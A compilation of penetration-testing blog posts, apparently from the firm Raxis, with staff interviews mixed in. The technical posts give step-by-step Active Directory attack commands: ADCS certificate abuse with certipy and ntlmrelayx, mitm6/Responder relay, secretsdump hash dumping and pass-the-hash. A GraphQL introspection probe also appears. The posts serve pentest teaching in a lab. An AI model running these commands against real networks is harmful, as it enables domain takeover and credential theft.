I recently updated the last installment in my AD series – Active Directory Certificate Services (ADCS) Misconfiguration Exploits – with a few new tricks I discovered on a recent engagement. I mentioned that I have seen web enrollment that does not listen on port 80 (HTTP), which is the default for certipy. I ran into some weird issues with certipy when testing on port 443, and I found that NTLMRelayx.py worked better in that case. As promised, here is a short blog explaining what I did.
This is basically the same thing as using certipy – just a different set of commands. So here we will go through an example and see how it works.
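A representative command looks like this (the CA host, scheme, and template name are placeholders for your target; this is a sketch of how I ran it, not the only valid form):
ntlmrelayx.py -t https://{CA Hostname}/certsrv/certfnsh.asp -smb2support --adcs --template {Template Name}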
The first part of the command points to the target. Make sure to include the endpoint (/certsrv/certfnsh.asp) as NTLMRelay won’t know that on its own. Also make sure to tell NTLMRelay if the host is HTTP or HTTPS.
The adcs flag tells NTLMRelay that we are attacking ADCS, and the template flag is used to specify the template. This is needed if you are relaying a domain controller or want to target a specific template. However, if you are planning on just relaying machines or users, you can actually leave this part out.
As connections come in, NTLMRelay will figure out on its own whether it’s a user or machine account and request the proper certificate. It does this based on whether the incoming username ends in a dollar sign: if it does, NTLMRelay requests a machine certificate; if not, it requests a user certificate.
Once NTLMRelay gets a successful relay, it will return a large Base64 blob of data. This is a Base64 encoded certificate.
You can take this Base64 blob and save it to a file. Then just decode the Base64 and save that as a PFX certificate file. After that the attack is the same as the certipy attack in my previous blog. Just use the certificate to login.
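For example, assuming the blob was saved to cert.b64 (file names are arbitrary):
base64 -d cert.b64 > cert.pfx
certipy auth -pfx cert.pfx -dc-ip {DC IP Address}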
I’m Nathan Anderson, the newest lead penetration tester at Raxis. I’ve been on the team several months now, but Bonnie cut me some slack since I was booked solid. This might be a good time to remind folks that a pentest earlier in the year is often much easier to schedule no matter what company you trust with your cybersecurity testing!
Bonnie: So I hear you’ve been working with tech from a young age?
Nathan: True, I’ve been working with information technology systems for over nine years. It all started in high school when my dad brought home an old Dell tower server that a client had decommissioned and an eight-port Cisco router. Those pieces of hardware became the platform for a young man’s experiments!
Bonnie: And you didn’t stop there. You continued into an IT degree in college as well?
Nathan: Exactly, I went from experimenting at home to college where I discovered Red Teaming and found my calling. I also ended up practicing coding and digital forensics. My forensics teacher at LCCC ended up losing a bet against a group of us regarding an off-hours project and bought us tickets to a Cleveland Browns game. Lots of fun memories there!
Bonnie: Now that sounds like a fun group! And by the time we met you, you had a number of certs under your belt too!
Nathan: After my experience in college I knew what I wanted to do, but I also knew that certifications hold more weight in the cybersecurity field… and I also realized that I needed some practice at pentesting. I started using HackTheBox and TryHackMe to practice while I got ready to take my OSCP.
Bonnie: With all of that time staring at a computer, what do you do to relax?
Nathan: Well, in my spare time I end up focusing more on tech projects, which I really truly enjoy. Recently, I have been working on a Raspberry Pi 4 and Pico Pi Micro Controllers. There’s always some new tech I want to get my hands on!
Bonnie: That’s awesome! But please tell me you really do get to step away from the computers sometimes and just chill?
Nathan: In my spare time, I really enjoy kayaking, hiking, and fishing! I have been kayaking all over Ohio, from Lake Erie down to the Hocking River in southern Ohio. It has been something that is always relaxing for me. I have also been hiking all across the northeastern U.S. Last year, my wife and I drove to the White Mountains in New Hampshire to get away. It was awesome!
Bonnie: You’re joining a good crew then! When our marketing director, Jim retired, he hiked more than half of the Appalachian Trail, and Brian and Brad have been known to go on hiking adventures together. Last year while I was in Norway, Mark’s family talked me into kayaking… I was nervous, but I agree with you now! It’s so relaxing and beautiful!
Nathan: We have made our trips within driving distance from our home; however, for us “driving distance” has meant up to 12 hours of driving. We have driven to the Ozarks in Missouri, to the Smoky Mountains in Tennessee, to the Upper Peninsula in Michigan, and to the White Mountains in New Hampshire. It has led to some great journeys! For our next trip, it isn’t going to be driving distance; I am shooting for Ireland. We will see what happens with that!
Bonnie: Those all sound amazing!
Nathan: One of our favorite non-outdoors things to do when traveling is finding the most interesting food we can. Recently we found the most interesting place when we were in Missouri at a place called “Top of the Rock.” One of the restaurants there served caribou stew and 90-day dry-aged steaks. I can tell you right now, I will absolutely be having both of those again.
Bonnie: Well, we’re really excited to have you on the Raxis team.
Nathan: I really enjoy the team here. I’m able to reach out to anyone with a question, and, if they don’t have the answer, they always direct me to the person who does. My favorite part of being a pentester is getting paid to break into things, and, at the same time, getting paid to basically have fun.
In the past few weeks, layoffs at several large pentesting companies have been in the news. At Raxis we understand the struggle to find and keep strong talent while balancing that against the sales needed to stay profitable, but it may be more than that.
With the recent announcement of layoffs that we’ve seen in cybersecurity firms, I can’t help but wonder if these bigger companies are missing the target due to their corporate nature and overly broad service offerings.
Raxis CEO, Mark Puckett
We’ve often been tempted to add to Raxis’ offerings to meet customers’ needs or to join growing markets, but we always come back to a focus on pentesting. From red teams to security reviews, network pentests to application tests, our pentesters are experts in their field and enjoy their work. That’s what keeps them learning (don’t remind them that counts as work and not just fun!) and it’s also what allows us to provide our customers with the highest quality actionable results.
We’ve had many pentesters come to us stating that they no longer want to work for larger operations.
And we get that. I feel the same way, but it feels good to know that the team at Raxis agrees and feels that we’ve built a company where each of us is a key part of the team and feels appreciated. There are no small roles at Raxis, and each of us knows that.
Being small allows us to maintain our strong feeling of camaraderie, despite the limitations of being virtual. We make it a point to get to know each other, have ‘zoom happy-hours,’ and encourage chatting on things outside of work from time to time on Slack.
Being 100% virtual makes for a very short commute and a pleasant work environment, but that’s not what makes Raxis special. Our team is very supportive, not just for work but also because we respect each other and feel a strong connection. If one of us collects Spam containers (you know who you are), the rest of us send photos of odd Spam we find (in the most surprising places). From kid’s birthday parties to cracking a difficult password, our team is there for each other.
We are largely a group of whitehat hackers, making it much easier to attract top talent in our industry.
That’s honestly what makes it so fun to work at Raxis. We’re a group of folks who care about helping companies stay secure. Our job is a lot of fun, but, in the end, we feel good about what we do.
Interested in joining the team? We’re looking for part-time contractor pentesters now. US citizens residing in the United States can apply on our Careers page.
Note: This blog was last updated 1/23/2024. Updates are noted by date below.
Active Directory Certificate Services (ADCS) is a server role that allows an organization to build a public key infrastructure, providing public key cryptography, digital certificate, and digital signature capabilities to the internal domain.
While using ADCS can provide a company with valuable capabilities on their network, a misconfigured ADCS server could allow an attacker to gain additional unauthorized access to the domain. This blog outlines exploitation techniques for vulnerable ADCS misconfigurations that we see in the field.
Tools We’ll Be Using
Certipy: A great tool for exploiting several ADCS misconfigurations.
PetitPotam: A tool that coerces Windows hosts to authenticate to other machines.
Secretsdump (a Python script included in Impacket): A tool that dumps SAM and LSA secrets using methods such as pass-the-hash. It can also be used to dump all of the domain’s password hashes from the domain controller.
CrackMapExec: A multi-faceted tool that, among other things, can dump user credentials while spraying credentials across the network to access more systems.
If an ADCS certificate authority has web enrollment enabled, an attacker can perform a relay attack against the Certificate Authority, possibly escalating privileges within the domain. We can use Certipy to find ADCS Certificate Authority servers with the tool’s find command. Note that the attacker needs access to the domain, but the credentials of a single authenticated user are all that is needed to perform the attack.
certipy find -dc-ip {DC IP Address} -u {User} -p {Password}
First, while setting up ADCS in my test environment, I set up a Certificate Authority to use for this testing.
Certipy’s find command also has a vulnerable flag that will only show misconfigurations within ADCS.
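For example:
certipy find -vulnerable -dc-ip {DC IP Address} -u {User} -p {Password}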
The text file output lists misconfigurations found by Certipy. While setting up my lab environment I checked the box for web enrollment. Here we see that the default configuration is vulnerable to the ESC8 attack:
To exploit this vulnerability, we can use Certipy to relay incoming connections to the CA server. Upon a successful relay we will gain access to a certificate for the relayed machine or the user account. But what really makes this a powerful attack is that we can relay the domain controller machine account, effectively giving us complete access to the domain. Using PetitPotam we can continue the attack and easily force the domain controller to authenticate to us.
The first step is to set up Certipy to relay the incoming connections to the vulnerable certificate authority. Since we are planning on relaying a domain controller’s connection, we need to specify the DomainController template.
certipy relay -ca {Certificate Authority IP Address} -template DomainController
Update 1/11/2024: While on an engagement I found that the organization had changed the default certificate templates. They had switched out the DomainController template with another one. So while I could successfully force a Domain Controller to authenticate, I would receive an error when trying to get a DomainController certificate. After a longer time than I care to admit, I used certipy to check the enabled templates and found that DomainController was not one of them. All I had to do was change the template name to match their custom template name. TL;DR: Check the templates if there is an error getting a DomainController certificate.
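To see which templates are actually enabled, you can rerun certipy’s find command; recent certipy versions also support an -enabled filter (verify the flag against your version):
certipy find -enabled -dc-ip {DC IP Address} -u {User} -p {Password}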
Now that Certipy is set up to relay connections, we use PetitPotam to coerce the domain controller into authenticating against our server.
python3 PetitPotam.py -u {Username} -p {Password} {Listener IP Address} {Target IP Address}
After Certipy receives the connection it will relay the connection and get a certificate for the domain controller machine account.
We can then use Certipy to authenticate with the certificate, which gives access to the domain controller’s machine account hash.
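The auth step looks like this (the PFX file name will match whatever the relay saved):
certipy auth -pfx {Certificate File} -dc-ip {DC IP Address}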
We can then use this hash with Secretsdump from the impacket library to dump all the user hashes. We can also use the hash with other tools such as CrackMapExec (CME) and smbclient. Basically anything that allows us to login with a username and hash would work. Here we use Secretsdump.
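A representative invocation, with placeholders for the domain, the DC machine account, and the NT hash (the LM half can be left empty):
secretsdump.py -hashes :{NT Hash} '{Domain}/{DC Machine Account}$@{DC IP Address}'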
At this point we have complete access to the Windows domain.
Update 1/23/2024: I have seen web enrollment that does not listen on port 80 (HTTP), which is the default for certipy. I tried to use certipy on an engagement where web enrollment was listening only over HTTPS, and I ran into some weird issues. I found that NTLMRelay seems to work better in that situation, so I’ve written a new post detailing that attack.
Exploit 2: ESC3
In order to test additional misconfigurations that Certipy will identify and exploit, I started adding new certificate templates to the domain. While configuring the new template, I checked the option for Supply in the request, which popped up a warning box about possible issues.
Given that I want to exploit possible misconfigurations, I was happy to see it.
Note: If you are testing in your own environment, once you create the template you will need to configure the CA to actually serve it.
After creating and configuring the new certificate template, we use Certipy to enumerate vulnerable templates using the same command we used to start the previous attack. Certipy identified that the new template was vulnerable to the ESC3 issue.
Exploiting this issue can allow an attacker to escalate privileges from those of a normal domain user to a domain administrator. The first step to gaining domain administrator privileges is to request a new certificate based on the vulnerable template. We will need access to the domain as a standard user.
certipy req -dc-ip {DC IP Address} -u {Username} -p {Password} -target-ip {CA IP Address} -ca {CA Server Name} -template {Vulnerable Template Name}
After acquiring the new certificate, we can use Certipy to request another certificate, this time a User certificate, for the administrator account.
certipy req -u {Username} -p {Password} -ca {CA Server Name} -target {CA IP Address} -template User -on-behalf-of {Domain\Username} -pfx {Saved Certificate}
With the certificate for the administrator user, we use Certipy to authenticate to the domain, giving us access to the administrator’s password hash.
certipy auth -pfx {Saved Administrator Certificate} -dc-ip {DC IP Address}
At this point we have access to the domain as the domain’s Administrator account. Using the tools we’ve previously learned about, like CME, we can take complete control of the domain.
crackmapexec smb {Target IP Address} -u {Username} -H {Password Hash}
From this point, we can use the Secretsdump utility to gather user password hashes from the domain, as previously illustrated.
Exploit 3: ESC4
Another vulnerable misconfiguration occurs when users have too much control over certificate templates. First, we configure a certificate template in the test network that gives users complete control over it.
Now we use Certipy to show the vulnerable templates using the same command as we used in the prior exploits.
We can use Certipy to modify the certificate to make it vulnerable to ESC1, which allows a user to supply an arbitrary Subject Alternative Name.
The first step is to modify the vulnerable template to make it vulnerable to another misconfiguration.
certipy template -u {Username} -p {Password} -template {Vulnerable Template Name} -save-old -target-ip {CA Server IP Address}
Note that we use the -save-old flag to save the old configuration. This allows us to restore the template after the exploit.
After modifying the template, we can request a new certificate specifying that it is for the administrator account. When specifying the new account use the account@domain format.
certipy req -u {Username} -p {Password} -ca {CA Server Name} -target {CA Server IP Address} -template {Template Name} -upn {Target Username@Domain} -dc-ip {DC IP Address}
Before we get too far, it’s a good idea to restore the certificate template.
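Since we used -save-old, certipy wrote the original settings to a JSON file, so restoring is a single command (the file name assumes -save-old’s default output):
certipy template -u {Username} -p {Password} -template {Vulnerable Template Name} -configuration {Vulnerable Template Name}.json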
After that we can authenticate with the certificate, again gaining access to the administrator’s hash.
certipy auth -pfx {Saved Certificate} -dc-ip {DC IP Address}
Exploit 4: Admin Control over CA Server
Another route to domain privilege escalation is available if we have administrator access over the CA server. In the example lab I am just using a domain administrator account, but in a real engagement this access could be gained in any number of ways.
If we have administrator access over the CA server, we can back everything up, including the CA’s private keys and certificates.
certipy ca -backup -ca {CA Server Name} -u {Username} -p {Password} -dc-ip {DC IP Address}
After backing up the CA server, we can use Certipy to forge a new certificate for the administrator account. In a real engagement the domain information would have to be changed to match the target.
certipy forge -ca-pfx {Name of Backup Certificate} -upn {Username@Domain} -subject 'CN=Administrator,CN=Users,DC={Domain Name},DC={Domain Top Level}'
After forging the certificate, we can use it to authenticate, again giving us access to the user’s NTLM password hash.
certipy auth -pfx {Saved Certificate} -dc-ip {DC IP Address}
Now that we setup an AD test environment in my last post, we’re ready to try out broadcast attacks on our vulnerable test network.
In this post we will learn how to use tools freely available for use on Kali Linux to:
Discover password hashes on the network
Pivot to other machines on the network using discovered credentials and hashes
Relay connections to other machines to gain access
View internal file shares
For the attacker machine in my lab, I am using Kali Linux. This can be deployed as a virtual machine on the Proxmox server that we setup in my previous post or can be a separate machine as long as the Active Directory network is reachable.
MiTM6 will pretend to be a DNS server for an IPv6 network. By default, Windows prefers IPv6 over IPv4 networks. Most organizations don’t utilize the IPv6 network space but don’t have it disabled in their Windows domains. Therefore, by advertising as an IPv6 router and setting the default DNS server to be the attacker, MiTM6 can spoof DNS entries, allowing for man-in-the-middle attacks. A note on its GitHub page even mentions that it is designed to run with tools like ntlmrelayx and responder.
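Starting mitm6 is simple; the domain and interface below are placeholders for your lab’s values:
sudo mitm6 -d {Domain} -i {Interface}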
Responder will listen for broadcast name resolution requests and will respond to them on its own. It also has multiple servers that will listen for network connections and attempt to get user computers to authenticate with them, providing the attacker with their password hash. There is more to the tool than what is covered in this tutorial, so check it out!
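A minimal invocation just names the interface to listen on (Responder has many more flags worth exploring):
sudo responder -I {Interface}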
CME is a useful tool for testing Windows computers on the domain. There are many functions within CME that we won’t be discussing in this post, so I definitely recommend taking a deeper look! In this post we are using CME to enumerate SMB servers, check whether SMB message signing is required, and connect to systems to perform post-exploitation activities.
First we will use CME to find all of the SMB servers on the AD network (10.80.0.0/24) and, additionally, to find those servers that do not require message signing. It saves the ones that don’t to the file relay.lst.
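The command looks like this:
crackmapexec smb 10.80.0.0/24 --gen-relay-list relay.lst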
Now we’re ready to start ntlmrelayx to relay credentials:
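One reasonable invocation (the -6 flag adds IPv6 listening for the mitm6-poisoned traffic; adjust to your setup):
ntlmrelayx.py -tf relay.lst -smb2support -6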
Ntlmrelayx is a tool that listens for incoming connections (mostly SMB and HTTP) and will, when one is received, relay (think: forward) the connection/authentication to another SMB server. These other SMB servers are those that were found earlier by CME with the --gen-relay-list flag, so we know they don’t require message signing. Note that the smb2support flag just tells ntlmrelayx to set up an SMBv2 server.
Almost immediately we start getting traffic over HTTP:
Running the Attack
So far the responder, mitm6 and ntlmrelayx screens just show the initial starting of the program. Not much is actually happening in any of them. The CME screen is just showing the usage to gather SMB servers that don’t require message signing.
To help things along with our demo, we can force one of the computers on the network to attempt to access a share that doesn’t exist.
While a user looking for a share that doesn’t exist is not needed for this attack, it’s a quick way to skip waiting for an action to occur naturally. Many times on corporate networks, machines will mount shares automatically, or users will need a share at some point, allowing an attacker to poison the request. If responder is the first to answer, our attack works; if not, the attack doesn’t work in that instance.
Responder captures and poisons the response so that the computer connects to ntlmrelayx, which is still running in the background.
Below we see where responder hears the search for “newshare” and responds with a fake/poisoned response saying that the attacker’s machine is in fact the host for “newshare.” This causes the victim machine to connect to ntlmrelayx which then relays the connection to another computer that doesn’t require message signing. We don’t need to see or crack a user password hash since we are just acting as a man in the middle (hence MiTM) and relaying the authentication from an actual user to another machine.
In this case the user on the Windows machine who searched for “newshare” turns out to be an administrator over some other machines, particularly the machine that ntlmrelayx relayed their credentials to. This means that ntlmrelayx now has administrator access to that machine.
The default action when ntlmrelayx has admin rights is to dump the SAM database. The SAM database holds the usernames and password hashes (NTLM) for accounts local to that computer. Due to how Windows authentication works, having the NTLM hash grants access as if we had the password. This means we can log in to this computer at any time as the local administrator WITHOUT cracking the hash. While NTLM hashes are often easy to crack, passing the hash directly speeds up our attack.
If other computers on the network share the same local accounts, we can then login to those computers as the admin as well. We could also use CME to spray the local admin password hash to check for credential reuse. Keep in mind that the rights and access we get to a server all depends on the rights of the user we are pretending to be. In pentests, we often do not start with an admin user and need to find ways to pivot from our initial user to other users with more access until we gain admin access.
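A sketch of that spray with CME (the hash is a placeholder; --local-auth targets local rather than domain accounts):
crackmapexec smb 10.80.0.0/24 -u Administrator -H {NTLM Hash} --local-auth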
The following screenshot shows ntlmrelayx dumping all of the local SAM password hashes on one device on our test network:
While getting the local account password hashes and gaining access to new machines is a great attack, ntlmrelayx has more flags and modes that allow for other attacks and access. Let’s continue to explore these.
Playing around with --interactive
Ntlmrelayx has a mode that creates new TCP sockets, allowing an attacker to interact with the SMB connections established after a successful relay. The flag is --interactive.
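For example, reusing the relay list from earlier:
ntlmrelayx.py -tf relay.lst -smb2support --interactive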
When the relay is successful a new TCP port is opened. We can connect to it with Netcat:
We can now interact with the host and the shares that are accessible to the user who is relayed.
nc 127.0.0.1 11000
nc 127.0.0.1 11001
Playing around with -socks
With a successful relay ntlmrelayx can create a proxy that we can use with other tools to authenticate to other servers on the network. To use this proxy option ntlmrelayx has the -socks flag.
Here we use ntlmrelayx with the -socks flag to use the proxy option:
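For example (again reusing the relay list from CME):
ntlmrelayx.py -tf relay.lst -smb2support -socks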
Below we see another user has an SMB connection relayed to an SMB server. With the proxy option, ntlmrelayx sets up a proxy listener locally. When a new session is created (i.e., a user’s request is relayed successfully), it is added to the running sessions. Then, by directing other tools to the proxy server from ntlmrelayx, we can use those tools to interact with these sessions.
In order to use this feature we need to set up our proxychains instance to use the proxy server setup by ntlmrelayx.
The following screen shows the proxychains configuration file at /etc/proxychains4.conf. Here we can see that, when we use the proxychains program, it is going to look for a socks4 proxy at localhost on port 1080. Proxychains is another powerful tool that can do much more than this. I recommend taking a deeper look.
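The relevant lines at the bottom of that file look like this:
[ProxyList]
socks4 127.0.0.1 1080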
Once we have proxychains set up, we can use any program that logs in over SMB. All we need is a user that has an active session. We can view the active sessions available for relaying by issuing the socks command in ntlmrelayx:
In this example I have a backup.admin session for each of the other two computers. Let’s use secretsdump from the Impacket library to gather hashes from the computers.
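Pointed through the proxy, the command looks like this (assuming the ad.lab domain from our lab setup):
proxychains secretsdump.py ad.lab/backup.admin@{Target IP Address}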
When the program asks for a password we can supply any text at all, as ntlmrelayx will handle the authentication for us and dump the hashes.
Since I am using a private test lab, the password for backup.admin is “Password2.” Here is an example of logging in with smbclient using the correct password:
Using proxychains to proxy the request through ntlmrelayx, we can submit the wrong password and still login successfully to see the same information:
Next Steps
All of the tools we discussed are very powerful, and this is just a sampling of what they can be used for. At Raxis we use these tools on most internal network tests. If you’re interested in a pentesting career, I highly recommend that you take a deeper look at them after performing the examples in this tutorial.
I hope you’ll join me next time when I discuss Active Directory Certificate Services and how to exploit them in our test AD environment.
Lead Pentester Andrew Trexler walks us through creating a simple AD environment.
Whether you use the environment to test new hacks before trying them on a pentest, or you use it while learning to pentest and study for the OSCP exam, it is a useful tool to have in your arsenal.
The Basics
Today we’ll go through the steps to set up a Windows Active Directory test environment using Proxmox to virtualize the computers. In the end, we’ll have a total of three connected systems, one Domain Controller and two other computers joined to the domain.
Setting up the Domain Controller (DC)
The first step is to setup a new virtualized network that will contain the Windows Active Directory environment. Select your virtualization server on the left:
This is a Windows based environment, but we’re using a Linux hypervisor to handle the underlying network architecture, so under System, select Network, and then create a Linux Bridge, as shown in Figures 2 and 3:
After setting up the network, we provision a new virtual machine where we will install Windows 2019 Server. Figure 4 shows the final configuration of the provisioned machine:
The next step is to install Windows 2019 Server. While installing the operating system make sure to install the Desktop Experience version of the operating system. This will make sure a GUI is installed, making it easier to configure the system.
Now that we have a fresh install, the next step is to configure the domain controller with a static IP address. This will allow the server to function as the DHCP server. Also make sure to set the same IP as the DNS server since the system will be configured later as the domain’s DNS server.
In order to make things easier to follow and understand later, let’s rename the computer to DC1 since it will be acting as our domain controller on the Active Directory domain.
Next, configure the system as a domain controller by using the Add Roles and Features Wizard to add the Active Directory Domain Services and DNS Server roles. This configuration will allow the server to fulfill the roles of a domain controller and DNS server.
After the roles are installed, we can configure the server and provision the new Active Directory environment. In this lab we will use the domain ad.lab. Other than creating a new forest and setting the name, the default options will be fine.
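If you prefer scripting to clicking through the wizard, a rough PowerShell equivalent of these two steps looks like this (a sketch; Install-ADDSForest will prompt for a safe mode password and reboot the server):
Install-WindowsFeature AD-Domain-Services, DNS -IncludeManagementTools
Install-ADDSForest -DomainName ad.lab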
Setting Up the DHCP Service
The next step is to configure the DHCP service. Here we are using a portion of the 10.80.0.0/24 network space, leaving enough addresses available to accommodate static IP addressing where necessary.
There is no need for any exclusions on the network, and we will set the lease to be valid for an entire year.
Adding a Domain Administrator and Users
Additional configuration is now required within the domain. Let’s add a new domain administrator and some new domain users. Their names and passwords can be anything you want, just make sure to remember them.
First we create the Domain Administrator (DA):
Here we also make this user an Enterprise Admin (EA) by adding them to the Enterprise Admins group:
Next we will add a normal user to the domain:
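For reference, the same accounts can be created from PowerShell (names are placeholders, not the ones used in the screenshots):
New-ADUser -Name {Admin Username} -AccountPassword (Read-Host -AsSecureString) -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members {Admin Username}
Add-ADGroupMember -Identity "Enterprise Admins" -Members {Admin Username}
New-ADUser -Name {Normal Username} -AccountPassword (Read-Host -AsSecureString) -Enabled $true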
Creating Windows PC
At this point we should have a functional Active Directory domain with active DHCP and DNS services. Next, we will setup and configure two other Windows 10 machines and join them to the domain.
The first step is to provision the resources on the Proxmox server. Since our test environment requires only moderate resources, we will only provision the machines with two processor cores and two gigabytes of RAM.
Then we install Windows 10 using the default settings. Once Windows is installed, we can open the Settings page and join the system to the ad.lab domain, changing the computer name to something easy to remember if called for.
Adding the system to the domain will require us to enter a domain admin’s password. After a reboot we should be able to login with a domain user’s account.
SMB Share
At this point, there should be three computers joined to the Active Directory domain. Using CrackMapExec, we can see the SMB server running on the domain controller, but no other systems are visible via SMB. So let’s add a new network share. Open Explorer.exe, select Advanced Sharing, and share the C drive.
I don’t recommend sharing the entire drive in an environment not used for testing, as it’s not secure: the entire contents of the machine would be visible. Since this is a pentest lab environment, though, this is exactly what we are looking for.
Creating the share exposes the SMB service to the network. In Figure 20 we verify this by using CrackMapExec to enumerate the two SMB servers:
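The check itself is a one-liner against the lab subnet:
crackmapexec smb 10.80.0.0/24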
Conclusion
At this point, our environment should be provisioned, and we are ready to test out different AD test cases, attacks, and other shenanigans. This environment is a great tool for ethically learning different exploits and refining pentesting techniques. Using a virtual infrastructure such as this also provides rollback capability for running multiple test cases with minimal downtime.
I hope you’ll come back to see my next posts in this series, which will show how to use this environment to test common exploits that we find during penetration testing.
GraphQL is a query language inspired by the structure and functionality of online data storage and collaboration platforms such as Meta, Instagram, and Google Sheets. This post will show you how to take advantage of one of its soft spots.
Development
Facebook developed GraphQL in 2012 and open sourced it in 2015. It’s designed to let applications query data and functionality stored in a database or API without having to know the internal structure or implementation. It makes use of the structural information exchanged between the data source and the query engine to perform query optimization, such as removing redundancy and including only the information that is relevant to the current operation.
To use GraphQL, since it is a query language (meaning you have to know how to code with it), many opt to use a platform to do the hard work. Companies like the New York Times, PayPal, and even Netflix have dipped into the GraphQL playing field by using Apollo.
Apollo
Apollo Server is an open-source, spec-compliant tool that’s compatible with any GraphQL client. It builds a production-ready, self-documenting GraphQL API that can use data from any source.
Apollo GraphQL has three primary tools and is well documented.
Client: A client-side library that helps you consume a GraphQL API and caches the data that’s received.
Server: A library that connects your GraphQL schema to a server. Its job is to communicate with the backend to send back responses based on the client’s request.
Engine: Tracks errors, gathers stats, and performs other monitoring tasks between the Apollo client and the Apollo server.
(We now understand that GraphQL is a query language and Apollo is a spec-compliant GraphQL server.)
A pentester’s perspective
What could be better than fresh, new, and developing technology? Apollo seems to be the king of the hill, but the issue here is that Apollo’s environment develops dynamically and fast. Its popularity is growing along with GraphQL’s, and there seems to be no real competition on the horizon, so it’s not surprising to see more and more implementations. The most difficult part for developers is having proper access controls for each request and implementing a resolver that can integrate with those access controls. Another key point is that constant new build releases come with new bugs.
Introspection
Batch attacks, SQLi, and debugging operations that disclose information are known vulnerabilities when implementing GraphQL. This post will focus on Introspection.
Introspection enables you to query a GraphQL server for information about the schema it uses: fields, queries, types, and so on. Introspection is mainly for discovery and diagnostics during the development phase. In a production system you usually don’t want just anyone knowing how to run queries against sensitive data, because when they do, they can take advantage of that power. For example, the following query returns interesting information and can be run by anyone against a production GraphQL API with introspection enabled:
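Here is a minimal example of such a query; it simply asks the server to list every type it knows about:
{__schema{types{name}}}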
Let’s try it
One can obtain this level of information in a few ways. One way is to use Burp Suite and the GraphQL Raider plugin. This plugin allows you to isolate the query statement and experiment on the queries. For example, intercepting a POST request for “/graphql”, you may see a query in the body, as shown below:
Using Burp Repeater with GraphQL, we can change the query located in the body, execute an introspection query for ‘name’, and see the response.
Knowing GraphQL is in use, we use Burp Extension GraphQL Raider to focus just on queries. Here we are requesting field names in this standard GraphQL request, but this can be changed to a number of combinations for more results once a baseline is confirmed.
This request checks the ‘schema’ for all ‘types’ by ‘name’. The response to that query is shown on the right.
Looking further into the response received, we see “name”: “allUsers”. Essentially, we are asking the server to please provide information that has “name” in it. The response gave a large result, and we spot “allUsers”. If we queried that specific field, it would likely return all the users.
The alternative would be to use curl. You can perform the same actions simply by placing the information in a curl statement. The same request as above, translated to curl, would look similar to this:
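For example, with the host as a placeholder:
curl -X POST http://{Target}/graphql -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}'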
You could opt to do this in the browser address bar as well, but that can be temperamental at times. So you can see how easy it is to start unraveling the treasure trove of information all without any authentication.
Even more concerning are the descriptive errors the system provides, which can help a malicious attacker succeed. Here we send a different curl statement to the server. This is the same request except that the query is for “system.”
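Again with the host as a placeholder, that request would look similar to this:
curl -X POST http://{Target}/graphql -H "Content-Type: application/json" -d '{"query":"{system}"}'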
When the request cannot be fulfilled, the server tries its best to recommend a legitimate field request. This allows the malicious attacker to formulate and build statements one error at a time if needed:
Pentest ToolBox
Ethical hackers would be wise to add this full introspection query to their toolbox, as it returns a long list of objects, fields, mutations, descriptions, and more:
{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
Ethical hackers may want to add these paths to their directory brute-force attacks as well:
/graphql
/graphiql
/graphql.php
/graphql/console
Conclusion
Having GraphQL introspection enabled in production might expose sensitive information and expands the attack surface. Best practice recommends disabling introspection in production unless there is a specific use case. Even then, consider allowing introspection only for authorized requests, and use a defense-in-depth approach.
You can turn off introspection in production by setting the value of the introspection config key on your Apollo Server instance.
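In Apollo Server that’s a one-line change; this is a minimal sketch, assuming the usual constructor setup:
const server = new ApolloServer({ typeDefs, resolvers, introspection: false });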
Although this post only addresses Introspection, GraphQL/Apollo is still known to be vulnerable to the attacks I mentioned at the beginning – batch attacks, SQLi, and debugging operations that disclose information – and we will address those in subsequent posts. However, the easiest and most common attack vector is Introspection. Fortunately, it comes with an equally simple remedy: Turn it off.
I’m Brice Jager, a lead penetration tester for Raxis — and the only one currently living in Iowa. My career path has taken me on a long journey from health care, to health care technology, and now to penetration testing. I’ve enjoyed all of it, but I now feel like I’m where I was meant to be.
Jim: Brice, in our discussions, it seems you’ve had two loves in your career: health and technology. I have to ask, which was the first to catch your eye, so to speak?
Brice: I guess I’d have to say technology because we were introduced to Apple computers in 3rd grade, and I was absolutely fascinated by them. I became serious about health at 12.
Jim: Yep, Steve Jobs believed in hooking his customers early. Was it just the interaction with technology, or did you actually realize you had an affinity for computers and how they worked?
Brice: Other kids were “interested.” I was obsessed with understanding them and learning what all they could do. If you had asked me back then, I would have probably said I was playing with the computers. In retrospect, I was really learning the fundamentals of programming. I even developed my own checkers game. At that point, we didn’t have widely available internet, so I had to learn from books — and a lot of trial and error.
Jim: Did your interest fade after that or did you continue to “play” with computers?
Brice: Ha! No, my interest only got more intense as I got older. By the ‘90s, I was into war-driving (riding around searching for vulnerable wireless networks) and basically looking for mischief wherever I could find it. Most people I knew were content with just using technology. I was still that kid who wanted the challenge of getting inside and finding out what made it all work.
Jim: You were a hacker even then.
Brice: I guess so. And remember, in those days, a lot of software and websites weren’t locked down as well as they are now. It was easier to see how everything was put together. I was able to give myself a terrific education.
Jim: So, what changed your focus to health care?
Brice: It didn’t change as much as it expanded. I always had a parallel interest in anatomy and physiology and overall health. In fact, it’s the same interest, only directed toward the body and not a computer. The fundamental questions I wanted to answer are the same as well: How does it work? What causes it not to work well? How can I make it work better?
Jim: Out of high school, you went with health care. What led you to that decision?
Brice: I found it easy because I had a pretty deep understanding of anatomy, and it was good to see people getting the results they always wanted. Over time, I became a neuromuscular specialist and helped people avoid surgery or avoid dependence on medications. In a nutshell, tricking the brain into healing itself.
Jim: You were hacking human brains?
Brice: Ha! Yeah, you hear that term a lot nowadays, but we were doing it literally and getting results. But there really wasn’t a career path beyond where I was without dancing on the line of burnout, and you quickly realize not all health care has the same goal in mind, so it can become frustrating.
Jim: You did go into sports medicine, though.
Brice: Yes. In fact, I even became a kinesiology (body mechanics) teacher from 2004 until 2010. I enjoyed it and I still dabble in it some, but I was ready for a change. What I found was a job with a software company out of Finland. They needed someone who understood their product and who could teach it to others, and oddly it was still in the health-related arena. The jump to technology sparked my interest and was refreshing.
Jim: Right up your alley on both counts.
